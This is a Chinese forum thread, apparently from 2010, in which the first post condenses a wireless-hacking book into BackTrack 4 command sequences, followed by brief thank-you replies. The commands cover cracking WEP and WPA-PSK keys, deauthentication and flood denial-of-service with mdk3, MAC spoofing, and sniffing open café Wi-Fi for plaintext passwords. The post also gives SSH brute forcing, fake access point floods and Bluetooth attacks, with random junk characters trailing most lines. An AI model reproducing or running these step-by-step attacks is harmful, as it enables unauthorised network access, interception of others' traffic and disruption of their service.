查看: 10583|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。' n8 y( N/ W9 a/ \( Y# n! q
; v9 D5 I- N& ?" P  g3 M; K7 Z7 K
以下所有操作均在BackTrack 4中进行。5 Y, c4 O0 }$ M! @) q  R

8 X$ ^* C: u2 m9 F8 {( _( `  d/ k8 T# y5 c  M3 w: T" Q
无线WEP加密P解:
6 j1 X1 u' H6 N" ~9 Q0 N4 P4 l$ p  w: n1 }
注入P解:6 ^) J. Y% [/ y$ l, A+ N$ D4 p

8 y- M$ K  a2 Z7 b5 H9 _' x7 ]ifconfig- G& T$ u4 r! l: E+ A5 m
' I: ~1 f% C0 [; |- ^
ifconfig –a/ R* f$ ]# H/ Z) Q% O
# i/ r* G" _1 q( T+ N
ifconfig wlan0(无线网卡) up: l4 K+ b  t2 m) h" o9 E
5 `9 g$ w) i6 q* Z, ^! \, q/ K
airmon-ng start wlan0
) h  t7 T% O3 d; q; }/ c6 m0 z4 M7 j- \. W, B
airodump-ng mon0
' n: a  V. e/ ^+ o9 [
5 D/ m+ J6 N; cairodump-ng --ivs –w ivsfile –c 频道 mon0或1 d% q7 I- \+ `! A( p7 @

# ^; C# x$ i" W4 e5 L6 r2 W% z5 hairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
0 p- U" O3 M; S! M* f' P/ V3 I$ l/ g% z5 l% a  a' K
aireplay-ng -3 –b BSSID –h Station mon0
( c/ a! c% n1 B2 ~. Y0 d4 m" H# T; R( [" a/ v
aircrack-ng ivsfile-01.ivs
3 Y6 G8 G( V' q- Z+ t6 F* K
# u$ d6 Q" g- \& V; q0 |虚连接P解(适用于无客户端连接APP解)3 [1 ~% k6 I. i+ z
( F7 d: j3 o, w! v" q. w
ifconfig# c' \* ]  z5 q" I! _, e9 B
, t, @& `& T1 {' U- T7 J1 @, t2 \
ifconfig –a
* O, D% R. U( g" a9 P1 I& J# L! ~# ?+ f6 G1 i
ifconfig wlan0(无线网卡) up
8 I4 Y3 v8 B, z3 F$ |; y1 s* `
airmon-ng start wlan0* i& k5 D% c% T  I: _; ?
) U2 i: d9 c5 Y) \/ x1 L
airodump-ng mon0) ~/ N4 V# F4 O3 z4 U/ r
+ i6 I# F! V2 n2 t
airodump-ng --ivs –w ivsfile –c 频道 mon0或
9 K- i5 H; w. u
0 ?, t4 M# i9 ]' H; G' l0 e  n8 zairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
7 V0 W2 J4 H* s* F+ }3 r5 ]# A2 d3 ?% j0 [: s) A+ B' C. A
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0! R& r+ Z  |# n

3 p; L/ j4 N( I: k1 |% l2 Taireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon05 N" P% m% I9 _! T/ w9 o( E

$ k" G" g# n6 o( A$ i% ?' B6 _8 Laircrack-ng ivsfile-01.ivs
5 e) u- \. l* ]9 D! A$ S1 \8 j5 ?; d/ r" q2 ?0 @4 u0 N+ b8 A
/ I* C/ j. z. f8 L- I
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。: `: N; S( C% y) P& b/ ^

) D5 c# G* O! D: F( G3 C: k) B) }( L. r; v) U7 Q! T2 M7 T
WPA-PSKP解. D( A1 Y, B: p8 V: m" b
+ S/ r" y  V4 Q0 t+ D  z1 H5 J
ifconfig6 Z* w7 x. Q5 n3 ?7 b

7 w- M0 {. ^) g  K% t$ uifconfig –a
$ Y4 Y! G6 q- m; N* J
5 o6 y% E% a1 oifconfig wlan0(无线网卡) up$ |1 g) I4 Q8 }
7 k2 d; ?' d% f6 Z, \8 N& e9 e
airmon-ng start wlan0
: k6 D& W4 F9 N$ ?# s' y
9 l! N' M% F& G( a( G3 ~0 f7 ?airodump-ng mon0
% y' G# t! b5 g* F% ?+ i
; U' s7 k& ~* m2 hairodump-ng –w capfile –c 频道 mon0
& A9 g$ k3 }) }( g' R3 y, p  j+ n3 U+ N& K  B1 _
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包$ J- j. S9 j- h6 T# S. @

( i& q' W  g& \7 X% z% E: v8 _6 Iaircrack-ng –w Dic capfile-01.cap或) h/ I+ r; F9 Z
9 h5 K- V1 e- [
cowpatty –f Dic –r capfile-01.cap –s SSID6 a0 g& v3 c1 Q4 C5 O% A  z( E$ m, J( T5 t
# e; S2 N5 z/ a+ ~
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
: t. w- y# h* G0 A& s: d7 L) Y. S8 B6 S0 c' i2 q4 t: G# X
傻瓜式P解软件SpoonWPA。% `' q% c  a# R6 ^8 |. C- b

8 v4 b8 ?- M) f" M. CBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst* C8 q9 `9 \+ q7 B9 P
/ @7 p- p4 n& ~. y4 c/ `

; b* z: n" y. t% e% f字典文件的生成和上传
; ^) [* d7 b. \; T% z, ]* A0 H
6 J4 \- a) i# m  L8 N在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。4 _8 w- M  }/ y+ E1 Q

# H+ N+ V2 `% Y; d# {
2 X9 J5 X' i; K- z( Q  ABT4下开启Tftp:Services—TFTPD—start TFTPD
0 q) I- }+ u# y) m1 ~: ]" L- O
2 b3 @; N( X, a& z( I在Windows的CMD中运行 tftp –i IP put **.dic
9 R! H6 I4 L! `' i, \/ y- I  F
% f: F, s3 H+ x( O( i( a% t: S7 q. b/ Z6 T: k
BT4下开启SSH:Services—SSH—start SSH
0 S# H0 j5 y) x9 j7 o% Z" i- U6 n0 ]6 p7 ?  X3 z
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
( l# N; h8 e. G* c) R  q- d, H; j) A) K& U" h

6 B+ G; Z2 S) i0 b, M1 }AP限制MAC时的解决
/ d" |6 b3 l: S. V- X6 Y/ `" i- _  Y% E* Q, \
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:" |4 n2 c1 i; D1 E3 ~' |- B- }# j

: `4 \) \0 f! \8 vifconfig wlan0 hw ether NewMAC
. [0 @! D  j- x  G% @* y8 P/ O7 o: O" j; Z& }5 S. H
/ `$ E* j8 W3 b
关闭SSID广播的AP探测:
) Z5 u4 }3 {  g$ U+ }, T4 ?7 n/ A% U* P3 R
1.     Deauth攻击:& L7 t1 ~8 X( M4 M0 v' n

/ X+ C7 A7 b3 ~' K2 M8 q) eairodump-ng mon07 D9 g( l% z8 n6 U0 R2 E! H/ z
# }6 N. J9 _4 J/ R/ G
aireplay-ng -0 10 –a BSSID –h Station mon0, E9 ^& z" `4 z# A1 y+ H1 @

1 J8 j/ U% [4 x& a1 Y2.     抓包分析' h1 T) I0 C! o, e
, A, e5 B* R- T* e+ [
Omnipeek
' y( w! v3 O' Y0 x$ V7 M0 e: T  g  V+ _  ?: n, _7 q
Tcpdump –n –e –vvv –i 网卡名
3 [0 R# B4 p" C* I% a4 S) i( r' ?
& v7 G) m! P+ U* C, E& [# e/ c9 _3.     暴力P解" `: @  W% _7 K: U& j

* R7 _  p. d! A& kCharon 1.1暴力P解
0 q& S0 n3 t  B$ H5 P  \, v" S/ L1 K' d2 z- O/ ^

- c+ w. Y8 ?6 z9 M, K无线加密数据包的解密
) n$ v, c/ y" K6 O* i+ c! t7 Y) S9 G: t
2 E0 C# [' I: D6 k. B( P. B
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
* |1 W' y( g8 Z
* W# l# b8 g2 N1 BFilterNS     DNS解析数据包, f+ [# Z) J( S& m
) L! j) h3 R: @7 k/ j# U: a  x% {
Filter:HTTP    WEB访问数据包
( Z8 ]2 G* \: V/ c" d& J; C% X% }7 W) n/ T& A
Filter:msnms   MSN
- p9 a8 u3 i7 v) v( U
- O/ L. X* g/ Q  K4 A: L. _. @% \Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。, ~2 O$ V  D  h3 X

! v/ v* F* Z/ s# X* ~9 y使用airdecap-ng解密:
, ?* C& S4 Y; i  |" B. }7 j% N, B& Z" u5 n$ y( w# _
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap# ]1 n- T+ j5 I7 p3 K% O
  @  v" o6 \/ I. @6 O
* E9 J, Q! r' Y$ B  ?
咖啡馆中无线数据截取(开放式无加密AP)1 g1 j; x$ |( Z( i; l3 c3 l
- F+ h2 T: K: u
1.Airodump-ng –w data –c频道 mon0" @& t2 ?9 _# X

9 ?+ c; r, n2 V2 z2 U2 E' }- C2 X' p2.使用WireShark打开分析
! I8 y* I& x# Y! H. A9 J9 d
, `2 X1 z8 b% d: l% K( O" N! e* e( t( g# m& _+ Y0 T7 V' a( R( Z
BT4下的渗透工具:* Y' q& D! j$ J0 y1 U) Q. ]
) ~1 e( ^' B; R5 M" x% X& s
nmap –sP IP/24        判断C段下存活的主机 % ?; \  b8 y9 Y# Y1 v( h1 Y$ J
: @" R* _+ X: I) l/ `# U: N  p
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放( _* ?0 x  r( i2 k* D+ o- D( M
5 |9 m# Q) W5 m8 _
nmap –vv –sV IP –p port   指定端口的详细信息。。。
% s6 o1 m) [$ J2 R  v  b  e
* V: x# ~( Y; {4 j2 q4 pnamp –O IP/24    判断主机的系统版本& M( a1 T( m; C9 S5 @. w9 N
7 r2 R4 Y) Y) D' a

* T; ~6 l9 G2 ?0 `4 i5 ^  p( Q% kGUI 版nmap:Zenmap 7 v% k; Y$ ?, S
/ F8 U) a5 @/ ~: [5 H: z' h
) j4 L( p0 N5 }7 l3 r
Amap使用:amap –B IP port! ]2 G/ q( k& i3 k

5 v/ T* P/ O* c1 X/ aNbtscan(扫描Windows网络NetBios信息):
8 Q( ]; s6 q, J9 k0 O$ ?* B$ [4 j
3 ^' y8 L# Z: @( m( xnbtscan –v –s : IP/242 Q3 G! U" P9 R, W4 B& z) S
4 y! S( |& M" K: o6 y$ l8 W
nbtscan –r IP
  t8 Z; p6 H% }: O9 s0 t) v1 x- y+ U

8 Q  L4 ?/ n2 U, H5 RDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
* |3 W, R7 @* a; r* W4 S9 }8 ~9 O
  J3 |6 j0 L, M0 L: {/ w
, _; [+ z* H8 |HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)( P) s& |7 W& r! O" P6 g, I

" c& [& J' ?, F. v: a# |1 B* }5 kBruteSSH: ./bruthe.py –h IP –u Username –d Dic
  r8 e2 u* @* R. U; A9 K4 G. u) C2 A. N7 g, I0 I7 w- h8 \
Metasploit3使用
& s3 f8 B0 G* M) a无线D.0.S' \' }1 j6 o7 E& }! e
8 h) H, E8 J; T' y  _4 r

' @8 \) k% r8 K: l2 k" q* }2 y. A, PAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击). ^6 n; t' k. b. B7 D3 k

$ X8 b$ u9 S2 Q. C  e3 z: H5 Rairmon-ng start wlan0
  q2 i6 R  ]3 O  W! {/ L: r* |, S# D% V" ^
airodump-ng mon0
, P9 \, x( K% ^. i+ [  x
0 C- e4 ^. _. m( ?mdk3 mon0 a –a BSSID
8 }$ J0 \. a8 K/ K2 Q& H5 V8 K7 d8 j( E, ~0 J, T! a$ b2 \
对所有的AP攻击:mdk3 mon0 a* l+ S8 P1 H# M, f$ v( J/ Z& C1 Z

  T# t" L. U% B+ Y# X. [3 v, |% O$ a- [$ H! ^; o
Deauth Flood 攻击
' l  i( v' f- `8 }) N6 E0 @2 q8 Y5 L: p! E( L$ J, R
mdk3 mon0 d –c Channel
. \  O, P" P6 w2 n# ?# d- V7 s- Q( w- h' @  Y5 P; E8 }8 l
图形化D.O.S攻击:Charon  d1 z: y5 M7 F6 d; A2 n# V# \* y

- N" {- F% G. f3 o- @1 F- z6 ~9 ^& o' K1 s: A8 q; O% e
当受到攻击时,使用Wireshark抓包可以看到异常信息。
0 |& N" f  S5 H8 F) O- m/ R" ~' K* P4 w3 I

1 [& t+ f2 y8 `+ M3 I8 E1 RWPA-PSK高速P解
) Y& T; h, \3 y; s
" g4 z4 a/ p4 b  d/ {" O3 O/ P1.       WPA-PSK PMK Hash TablesP解( D) D3 n8 _; m6 |
: i  w: i$ M& u/ A8 y
Cowpatty –d HashTable.hash –r ***.cap –s SSID* [) p( P7 X2 {6 ^
# \/ K  W: ]" n/ _/ C
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID3 [; `$ d/ ^$ ]0 u" F3 l5 J

% L+ T3 f; o7 V3 B- I1 H4 o2.       GPU辅助高速P解7 d/ i$ ]; T6 N9 B: Q, R$ P
5 ?5 k5 k2 P- ?  R
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。) W1 H2 H$ o) v7 U/ O1 w

4 t& l+ e" }1 d/ F3.       分布式P解
+ S5 u4 Q0 q! ~9 I
0 e6 t  g% r2 C/ ]1 Y
0 ]7 z' q" Y4 C& h$ V9 T# aAP的伪造6 j% Q5 q4 ^; `9 |  |" \4 T' N

0 F/ j6 K" Z. F; g) U" W把AP的MAC改成目标AP的MAC! H  Y0 {3 c$ B% T- ^0 C

* J7 U3 ^) U5 j) P! `' O网卡软AP( ]: s5 }5 A/ i
# w% W7 I4 X0 l+ `3 O, J
3 K: M! k  q& j: F! }8 Y, n
伪造大量虚假AP信号:% ]0 A0 k2 p# S  q; A: L4 H

+ n: R, W4 I& u( l. e随机SSID:mdk3 mon0 b –g –c 频道 2 G0 v& ], ?2 V9 \$ Q

6 K4 f7 Y- {  F7 a指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度% I; H. E- |3 I6 e6 a
8 Q* x. `! O; H5 |  `7 z2 V* O; E8 b

7 }* a! ^. B. DWar-Driving, O' k. U: A! a" j
6 \2 P. I  B8 o8 e
热点地图绘制
, P( d. x# \+ F$ L
8 j- ~6 j+ x% Z, }$ d& p( wWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
9 q. k) y" R1 [6 f  e: T9 `3 m
/ g/ }6 z  [, i* u! o+ \
" K4 h! X- r& L% ^. B# f8 vNetstumble
8 M' i3 _3 O* Q# J/ s  h; s7 e4 A8 S4 ]. {9 }8 T- H, @6 v
3 c: L9 P% ?6 [! M* p# m1 D, @
蓝牙Hacking1 T8 f- W$ X# A/ t. s7 J3 N4 _

' i! n! M! ^- y1 }1 v- g% PWindows下的Blue Soleil工具
0 b/ a/ l& l5 L& u1 Q) ~5 }
  P  K8 Q: }' H# v0 d1 V) C5 a% LBT4:6 D- x; n& g( P+ |  C: b

  l6 T7 j9 Q  Vhciconfig 查看蓝牙适配器0 ]/ i% V$ N/ y  O/ o' \) u
  a. V4 X% T: Q, [0 X7 Y
hciconfig hci0 up 载入蓝牙适配器, f7 b6 p0 W( O4 q* L. a

" T" M1 w" q+ i3 I9 F+ jhciconfig hci0 class 蓝牙适配器详细信息5 n/ Y# J; K8 Q2 E
9 a, N4 Z/ Y, X+ r( j5 Z
2 I, O7 _2 n& o3 l; P/ x
hcitool(扫描蓝牙)" Q; J4 J1 a  M' _8 U$ E

5 U: ~: t* f- e7 Jhcitool –i hci0 scan
! }& J) D( p( m$ _& p7 s# ?' ^. ], B$ |. L. ?, _
BTscanner(扫描蓝牙)7 H( I, _4 C+ W9 @4 O

3 K% a9 K, A. i1 [! @& z* s% V' o( f7 f& Q2 E) K$ G9 g; X
蓝牙攻击:8 a( ~% A% r( v

, |* z2 |: h" s) u9 WBlueBugging (适用于BlueTooth V1.1的手机)
3 @; \- m. ^9 l; G+ I: B3 i  S0 N$ K2 L! Y' ~' w
Bluebugger工具:# m4 Z3 T, M9 x0 k

! k- K0 v# R# |Bulebugger –a HD_Addr info
+ ~" C  K$ W2 e( M5 H8 g7 l8 Q  o. {
( W0 i- z, `2 t9 q, T' h
BlueJacking) k3 [0 F2 y0 h. N- P& D  r

. V7 D) S, \& x' Q实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。+ M& M" e! n+ D3 t- d2 u! X2 f- r

5 Z$ J' U0 V/ c/ D- a) K
5 d' d& G: y! m4 I: f7 }HD_Addr修改:( ~0 u% _0 I; ]$ s& c. Y

7 P: C# k9 j6 D1 ~Bdaddr工具
" m/ m( @9 e7 b# U( v. c  I" ~2 r% C, _: I5 F' d5 H
bdaddr –i 蓝牙设备名 新HD_addr! g+ G& V1 j% _% F/ S

7 R+ T1 c- i; a5 _. s) j7 N' r5 ~. d' P" _8 j4 \+ x' B
蓝牙D.O.S2 k6 Y  x$ ^2 E0 x) q2 [
3 u# Q; ?9 k$ X
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
8 P. y1 @' W, Y/ u6 d' c! Y. M  I2 a. I- A6 i* [" j6 N
hciconfig
6 s3 R" K! ^/ X. a7 x( K# C
/ ?) N" i: t) B$ [5 Nhciconfig hci0 up8 e: B- S9 z2 Y6 R
2 E- ]1 t& \. K% ?, C
hcitool –i hci0 scan. I% W. u% p8 q3 F8 Z6 W0 \! n" n

. M5 B4 p2 K7 Q# W8 f9 @! Z) e! Nl2ping –s 10000 –目标MAC
/ s% N0 |# z. C9 G) W9 o' t3 W4 c9 [& Q7 I* P, Q0 n1 R& z
$ d2 G/ K6 {* s+ ?& E
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
, @4 r6 }; g9 F9 v8 M( V; M4 @: O8 c+ j; P, y6 h9 J
./fang –r ************-############ -s$ o- q; A* E' N* r
* P5 a- a9 i( D
暴力P解************-############的蓝牙设备$ k5 }- o, _, _! k% w  `1 G: H

2 G* Z) v2 q% }% k./fang –l 各厂商BD_Addr分配$ ^# M. D+ @! k  ^) N
' V+ f2 H: k, I! U: l7 \/ y

& X4 V! L6 ^- oWifiZoo使用
1 m9 e1 D4 Q" j8 T( C  u- l5 e  ^# X3 n0 [& b, ~
./wifizoo.py –c Capfile8 X1 k- ^& k2 y3 W7 U4 F
' T, N* M- E8 e! R
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

907

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。/ V0 f5 s4 g. W/ `( b! {
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
4 d( F8 e' Z7 v; @" m" Y呵呵 其实也不贵 21块 快递再一点
) v1 s1 G6 A3 k# n' z4 y3 O. m' G我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-8-26 21:32

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表